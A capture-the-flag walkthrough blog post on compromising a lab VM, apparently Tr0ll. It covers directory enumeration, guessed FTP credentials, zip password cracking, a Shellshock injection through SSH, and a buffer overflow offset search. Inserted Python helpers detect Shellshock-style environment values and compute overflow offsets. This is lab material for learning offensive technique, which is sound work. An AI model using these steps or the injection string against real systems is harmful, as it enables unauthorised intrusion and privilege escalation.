They bother me :-) I opened the <b>robots.txt</b> file and there are several paths.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVFqkcCSDl3E5Il1k7mYjjjZ420rC8q-dI9aUowctI6LigtQ_M4JuQ0j6NmdDJJzDNP7XEliodBATC_DueghhDDCQzrpjS1uYGt7RMQz3IlegZEVHu6Pj44o-SoGk31Hw5SUyBICwhzvA/s1600/robot.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVFqkcCSDl3E5Il1k7mYjjjZ420rC8q-dI9aUowctI6LigtQ_M4JuQ0j6NmdDJJzDNP7XEliodBATC_DueghhDDCQzrpjS1uYGt7RMQz3IlegZEVHu6Pj44o-SoGk31Hw5SUyBICwhzvA/s400/robot.png" width="247" /></a></div>
<br />
Nice, isn't it? I added these paths to a wordlist and ran DirBuster. We have got the following result<br />
<blockquote class="tr_bq">
Dir found: /noob/ - 200<br />
Dir found: /keep_trying/ - 200<br />
Dir found: /ok_this_is_it/ - 200<br />
Dir found: /dont_bother/ - 200</blockquote>
OK, so only four paths are not fake. So let's examine them. Hmm, on each path I have got the same response<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4fQpagj6sAFfVTtC04PZYTc2-kpu6S34QGj7qn_iQAdE7oWfCSy1VFi4Y6QC9mM7qJBtwQR315Y8iLj1VmTF138TBqgxjeAol5JXXRZDmfHjTUmalaB_R__Cm9yeKPd0nOkrmbwUgGwc/s1600/cat.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4fQpagj6sAFfVTtC04PZYTc2-kpu6S34QGj7qn_iQAdE7oWfCSy1VFi4Y6QC9mM7qJBtwQR315Y8iLj1VmTF138TBqgxjeAol5JXXRZDmfHjTUmalaB_R__Cm9yeKPd0nOkrmbwUgGwc/s640/cat.png" width="640" /></a></div>
<br />
OK, the picture must contain something hidden - I am pretty sure.<br />
The picture from <b>/dont_bother/</b> has an injected comment<br />
<blockquote class="tr_bq">
Look Deep within y0ur_self for the answer</blockquote>
Hmm, OK, I browsed the <b>/y0ur_self/</b> directory<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRcVM4x_P72kYLcVh5LsWa81NNlAW3V_VP5N2SMB5lYiUQMDdhagvxUZhY0dmDd5frLtnQdGqhmhIX3aq-hIA5CaplrTbE_mGnl7JhAO8Vz_7_jhLCpoFcNuL2Zf_-8929jwTzmrzD59k/s1600/ans.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRcVM4x_P72kYLcVh5LsWa81NNlAW3V_VP5N2SMB5lYiUQMDdhagvxUZhY0dmDd5frLtnQdGqhmhIX3aq-hIA5CaplrTbE_mGnl7JhAO8Vz_7_jhLCpoFcNuL2Zf_-8929jwTzmrzD59k/s400/ans.png" width="400" /></a></div>
<br />
I have downloaded the <b>answer.txt</b> file and it contains a lot of base64-encoded lines.<br />
I brute-forced the FTP credentials using the decoded answer.txt file, without success. So, I was wondering what the credentials might look like, and I thought about root:root, so maybe Tr0ll:Tr0ll?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9ZHVcu2dYa8CkhTxfOTnqbrRHODR8nfOgO83IfAnymnlll_GT78ZkOStVG5AhSqnLWDmg60YBeHUVQw4pCtfZHrlMsuvPgM38KZUCycEfFghLEMKvkjQmdNhzDChXDij8WivfC1-H0Xo/s1600/ftp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9ZHVcu2dYa8CkhTxfOTnqbrRHODR8nfOgO83IfAnymnlll_GT78ZkOStVG5AhSqnLWDmg60YBeHUVQw4pCtfZHrlMsuvPgM38KZUCycEfFghLEMKvkjQmdNhzDChXDij8WivfC1-H0Xo/s1600/ftp.png" /></a></div>
<br />
Great! Let's download <b>lmao.zip</b> file and unpack it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEintQRppnht4vSxAXxiNFSI6CMsI4OXE7VSoAdVD2LtdDBocsb7P3upHLem5VJ_4Uqaac4RUw8H3TsQg94CoIjfQ0ML3kB9g8TcGA7RD5shzR6K_MX48CdHZFDOZChhgMc6XaAG7WUbJVs/s1600/lmao.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEintQRppnht4vSxAXxiNFSI6CMsI4OXE7VSoAdVD2LtdDBocsb7P3upHLem5VJ_4Uqaac4RUw8H3TsQg94CoIjfQ0ML3kB9g8TcGA7RD5shzR6K_MX48CdHZFDOZChhgMc6XaAG7WUbJVs/s1600/lmao.png" /></a></div>
<br />
Oops, we need a password... Maybe answer.txt would be useful in this case?<br />
<blockquote class="tr_bq">
PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL</blockquote>
Awesome! I have unpacked the lmao.zip file using the recovered password<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUBkAY1O6uLQYypC_vxRn7lZW0PSY6f7QkdoB4kPsxNt98OzXHddeF9eddLP9kk1wnSqvMhUFfTFbQH0FYIEzlfAxjunhRyR1jotW1UD-fa14Mo7PYGdHJMXuGak9xTNj3w2AP3VIu18U/s1600/noob.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUBkAY1O6uLQYypC_vxRn7lZW0PSY6f7QkdoB4kPsxNt98OzXHddeF9eddLP9kk1wnSqvMhUFfTFbQH0FYIEzlfAxjunhRyR1jotW1UD-fa14Mo7PYGdHJMXuGak9xTNj3w2AP3VIu18U/s1600/noob.png" /></a></div>
<br />
We have got a private key for SSH! Let's try to log in using the key.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXXVhxYsxXvNu_Ng0glyyOU3QYjJyu1NTNIgSfYMgWYpHxxc3eao6qfLbUgrtw5rUsyfhn_b_QkNoS-gcqRugYwUuTcaSu5W5LLqHFaRlLhMq4AF4Xl36VvlLwTrGoy8LXQYMsxNGGLhY/s1600/Screenshot+from+2016-07-12+07-09-02.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXXVhxYsxXvNu_Ng0glyyOU3QYjJyu1NTNIgSfYMgWYpHxxc3eao6qfLbUgrtw5rUsyfhn_b_QkNoS-gcqRugYwUuTcaSu5W5LLqHFaRlLhMq4AF4Xl36VvlLwTrGoy8LXQYMsxNGGLhY/s1600/Screenshot+from+2016-07-12+07-09-02.png" /></a></div>
<br />
I don't know what is going on. Let's use verbose mode.<br />
<blockquote class="tr_bq">
OpenSSH_7.2p2 Debian-5, OpenSSL 1.0.2h 3 May 2016<br />
debug1: Reading configuration data /etc/ssh/ssh_config<br />
debug1: /etc/ssh/ssh_config line 19: Applying options for *<br />
debug1: Connecting to 192.168.56.101 [192.168.56.101] port 22.<br />
debug1: Connection established.<br />
debug1: permanently_set_uid: 0/0<br />
debug1: key_load_public: No such file or directory<br />
debug1: identity file noob type -1<br />
debug1: key_load_public: No such file or directory<br />
debug1: identity file noob-cert type -1<br />
debug1: Enabling compatibility mode for protocol 2.0<br />
debug1: Local version string SSH-2.0-OpenSSH_7.2p2 Debian-5<br />
debug1: Remote protocol version 2.0, remote software version OpenSSH_5.9p1 Debian-5ubuntu1.4<br />
debug1: match: OpenSSH_5.9p1 Debian-5ubuntu1.4 pat OpenSSH_5* compat 0x0c000000<br />
debug1: Authenticating to 192.168.56.101:22 as 'noob'<br />
debug1: SSH2_MSG_KEXINIT sent<br />
debug1: SSH2_MSG_KEXINIT received<br />
debug1: kex: algorithm: ecdh-sha2-nistp256<br />
debug1: kex: host key algorithm: ecdsa-sha2-nistp256<br />
debug1: kex: server->client cipher: aes128-ctr MAC: umac-64@openssh.com compression: none<br />
debug1: kex: client->server cipher: aes128-ctr MAC: umac-64@openssh.com compression: none<br />
debug1: sending SSH2_MSG_KEX_ECDH_INIT<br />
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY<br />
debug1: Server host key: ecdsa-sha2-nistp256 SHA256:I3xuSgcBlIsoldKTkOyVYwx8B4NLGl0fDDTi0H6ExYg<br />
debug1: Host '192.168.56.101' is known and matches the ECDSA host key.<br />
debug1: Found key in /root/.ssh/known_hosts:4<br />
debug1: rekey after 4294967296 blocks<br />
debug1: SSH2_MSG_NEWKEYS sent<br />
debug1: expecting SSH2_MSG_NEWKEYS<br />
debug1: rekey after 4294967296 blocks<br />
debug1: SSH2_MSG_NEWKEYS received<br />
debug1: SSH2_MSG_SERVICE_ACCEPT received<br />
debug1: Authentications that can continue: publickey,password<br />
debug1: Next authentication method: publickey<br />
debug1: Trying private key: noob<br />
debug1: Authentication succeeded (publickey).<br />
Authenticated to 192.168.56.101 ([192.168.56.101]:22).<br />
debug1: channel 0: new [client-session]<br />
debug1: Requesting no-more-sessions@openssh.com<br />
debug1: Entering interactive session.<br />
debug1: pledge: network<br />
debug1: Remote: Forced command.<br />
debug1: Sending environment.<br />
debug1: Sending env LANG = en_US.UTF-8<br />
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0<br />
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0<br />
TRY HARDER LOL!<br />
debug1: channel 0: free: client-session, nchannels 1<br />
Connection to 192.168.56.101 closed.<br />
Transferred: sent 2696, received 1712 bytes, in 0.0 seconds<br />
Bytes per second: sent 54430.6, received 34564.2<br />
debug1: Exit status 0</blockquote>
We have to google what that is. I found that this may be the Shellshock vulnerability.<br />
So, let's verify our prediction<br />
<blockquote class="tr_bq">
root@kali:~# ssh -l noob -i noob 192.168.56.101 '() { :;}; echo MALICIOUS CODE'<br />
MALICIOUS CODE<br />
TRY HARDER LOL!</blockquote>
Yes, there is Shellshock, so we are able to exploit it.<br />
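Why the forced command did not stop this: sshd hands the command the client asked for to the forced command through the SSH_ORIGINAL_COMMAND environment variable, and an unpatched bash imported any environment value beginning with the literal prefix "() {" as a function definition, then went on executing whatever followed the closing brace. The added Python below (mine, not the author's) applies that same parse rule to scan an environment or a set of request headers for such values, and runs the classic local probe to confirm the installed bash is patched; the captured mapping in the demo is constructed from the command shown above.

```python
import os
import subprocess

# An unpatched bash treated any environment value starting with this literal
# prefix as an exported function and kept parsing after the closing brace,
# so the trailing text was executed when the shell started.
FUNC_IMPORT_PREFIX = "() {"


def trailing_code(value):
    """Return the text a vulnerable bash would have executed after the function
    body, or None if the value is not a function import with a trailer.
    Brace matching is deliberately simple (braces inside quotes are not special)."""
    if not value.startswith(FUNC_IMPORT_PREFIX):
        return None
    depth = 0
    for i, ch in enumerate(value):
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                trailer = value[i + 1:].lstrip(" \t;")
                return trailer or None
    return None


def scan_environment(mapping):
    """Report (name, trailing code) for every value that carries an injection.
    Feed it os.environ, CGI request headers or a captured SSH_ORIGINAL_COMMAND."""
    hits = []
    for name, value in mapping.items():
        code = trailing_code(value)
        if code is not None:
            hits.append((name, code))
    return hits


def local_bash_imports_trailing_code():
    """Classic probe: export a function-shaped variable and see whether its
    trailer runs. True = vulnerable, False = patched, None = no bash available."""
    env = dict(os.environ, x="() { :;}; echo vulnerable")
    try:
        proc = subprocess.run(["bash", "-c", "echo probe"], env=env,
                              capture_output=True, text=True, timeout=10)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return "vulnerable" in proc.stdout


if __name__ == "__main__":
    # Constructed example: the command string from the post as sshd would
    # have exposed it to the forced command.
    captured = {"SSH_ORIGINAL_COMMAND": "() { :;}; echo MALICIOUS CODE",
                "LANG": "en_US.UTF-8"}
    print(scan_environment(captured))
    print("local bash vulnerable:", local_bash_imports_trailing_code())
```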
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibA9rIPbkxsSWoQWqSRcj-IiA2XM9CcNQun5xkkdTp5dvf17RA3qrt4w-ZfYw_XhVPFlQ07BTL9ZBwpk8kgh0rc9SrP8OeCl5Z3CbxkAPtMtl0glOOkslDIssn9qQfYr1R3YOv5r5MWI0/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibA9rIPbkxsSWoQWqSRcj-IiA2XM9CcNQun5xkkdTp5dvf17RA3qrt4w-ZfYw_XhVPFlQ07BTL9ZBwpk8kgh0rc9SrP8OeCl5Z3CbxkAPtMtl0glOOkslDIssn9qQfYr1R3YOv5r5MWI0/s1600/shell.png" /></a></div>
<br />
Great! We have got a limited shell. I went to the <b>/home/noob/</b> directory and found<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsLQWHrpST88Xi7-t9kApxe0JhWaNLz1F444dWyvD0ig9d-uDnLxUf7AM7nbAuvJwgXyWAOZsmVddHMCcd9rEfK510XabeO_tjJ__vqfxVxi5tWnGE5WoSl3S8RtTitVU8tpNAPcu0-Gc/s1600/poc.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsLQWHrpST88Xi7-t9kApxe0JhWaNLz1F444dWyvD0ig9d-uDnLxUf7AM7nbAuvJwgXyWAOZsmVddHMCcd9rEfK510XabeO_tjJ__vqfxVxi5tWnGE5WoSl3S8RtTitVU8tpNAPcu0-Gc/s1600/poc.png" /></a></div>
<br />
So, we need to find the <b>bof</b> file and use a buffer overflow to get root, and it would be over.<br />
<br />
I found an interesting file<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkG6l3-6jIP124IOtaqsc8MMiHqu2_FkjZeciVkuUErpwV9g7pspGDcaZJV5QBQS1cMgUVxdXXfqSkl51a3WJonR6KzUor5wh_xi5RnOimQ2xvdYtvH0qGUZ2RRRAzL04QEjGDG1h_L8/s1600/noobek.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzkG6l3-6jIP124IOtaqsc8MMiHqu2_FkjZeciVkuUErpwV9g7pspGDcaZJV5QBQS1cMgUVxdXXfqSkl51a3WJonR6KzUor5wh_xi5RnOimQ2xvdYtvH0qGUZ2RRRAzL04QEjGDG1h_L8/s640/noobek.png" width="640" /></a></div>
<br />
Let's try to perform a buffer overflow.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVXCTbSZTRLGpBxHVzLQfvuUsSS2eIe0xoX82Yn80ZNHvDmJ0Shb5pT_aQ8Q160U5tQngU2_OMH12P7jaL_L65cN0ex7YQONjeWe_OsCriEaljXI5F5cswbAAygBFrbXPF5sv_Aozjwdk/s1600/blekurwa.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVXCTbSZTRLGpBxHVzLQfvuUsSS2eIe0xoX82Yn80ZNHvDmJ0Shb5pT_aQ8Q160U5tQngU2_OMH12P7jaL_L65cN0ex7YQONjeWe_OsCriEaljXI5F5cswbAAygBFrbXPF5sv_Aozjwdk/s1600/blekurwa.png" /></a></div>
<br />
Now we are sure that we have to prepare a buffer overflow payload. To perform this kind of attack we have to know the offset in the input at which the saved EIP register is overwritten.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlU95hY_wWSy8kXkhwKzqmK7NiR_fAZkUF1ITjmOIsRT7oObI_4RGBbDZbkEo2sH4-RDLhy22BcC43pUnlPCdBu5VdeZmgohDZIRnHJb9tAQofNR1F7l0MrewLtSNGN_QZT6Yt0JAwRsg/s1600/bof.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlU95hY_wWSy8kXkhwKzqmK7NiR_fAZkUF1ITjmOIsRT7oObI_4RGBbDZbkEo2sH4-RDLhy22BcC43pUnlPCdBu5VdeZmgohDZIRnHJb9tAQofNR1F7l0MrewLtSNGN_QZT6Yt0JAwRsg/s1600/bof.png" /></a></div>
<br />
So, we know that our payload should be: [268 bytes of filler] + [EIP] + [trash].<br />
I examined this application and I couldn't find a <b>JMP ESP</b>, but we can use <b>CALL EAX</b>.<br />
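The 268-byte offset is what the crash in the screenshot gives away: the usual way to read it off is to feed the program a non-repeating pattern, take the value the debugger shows in EIP when it faults, and look up where those four bytes sit in the pattern. The added Python below (mine, not the author's tooling) builds the Metasploit-style pattern and does the lookup, taking care of the little-endian byte order in which the register value is printed; the 268 in the demo is taken from the post, the binary itself is not involved.

```python
import string
import struct

MAX_UNIQUE_LEN = 26 * 26 * 10 * 3  # 20280 bytes before the triplets repeat


def msf_pattern(length):
    """Metasploit-style pattern Aa0Aa1Aa2...: every 3-byte triplet is unique,
    so any 4-byte window identifies exactly one position."""
    if length > MAX_UNIQUE_LEN:
        raise ValueError("pattern longer than %d bytes repeats" % MAX_UNIQUE_LEN)
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern, eip_value):
    """Given the register value from the crash (an int, as gdb prints it),
    undo the little-endian load and return the offset of those bytes in the
    pattern, or None if the value did not come from the pattern."""
    needle = struct.pack("<I", eip_value & 0xFFFFFFFF).decode("latin-1")
    idx = pattern.find(needle)
    return idx if idx != -1 else None


def eip_value_at(pattern, offset):
    """Demo helper: the value EIP holds if the 4 bytes at `offset` are loaded into it."""
    return struct.unpack("<I", pattern[offset:offset + 4].encode("latin-1"))[0]


if __name__ == "__main__":
    pat = msf_pattern(300)
    crash_eip = eip_value_at(pat, 268)  # offset reported in the post
    print(hex(crash_eip), "->", pattern_offset(pat, crash_eip))
```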
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPWflFy1etMtFxxMJjfNRbOesDBRTd7svvPLnsEk0zdOKK9EUQu5Qzd2rL9Gz1NjdGbx9YoVwYKq0_catiNFVIKUDa4qH9CM0km77AmXuFU0qUngwhgWNwf5ou5xLpemMXnIieUIuJKz0/s1600/call.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPWflFy1etMtFxxMJjfNRbOesDBRTd7svvPLnsEk0zdOKK9EUQu5Qzd2rL9Gz1NjdGbx9YoVwYKq0_catiNFVIKUDa4qH9CM0km77AmXuFU0qUngwhgWNwf5ou5xLpemMXnIieUIuJKz0/s1600/call.png" /></a></div>
<br />
Good, but unfortunately it does not work :( Maybe I am wrong, so let's try again to find a jmp esp.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEqSsrtHtfZpugshjuQWL5ufok5iiHRvKLaj8kI0bcWrBCK1zEH6r3PMFLAsxaWSLHoICBcL16yrNNcZExKq9DZhRKp4i0Ze4LdSWdB8FnVl6h45RkG7YjO-3xZK7SgtvLncGrTpBd_Mw/s1600/esp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEqSsrtHtfZpugshjuQWL5ufok5iiHRvKLaj8kI0bcWrBCK1zEH6r3PMFLAsxaWSLHoICBcL16yrNNcZExKq9DZhRKp4i0Ze4LdSWdB8FnVl6h45RkG7YjO-3xZK7SgtvLncGrTpBd_Mw/s1600/esp.png" /></a></div>
<br />
Wow, there is a <b>JMP ESP</b> after all, so let's generate appropriate shellcode and execute it locally.<br />
<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.com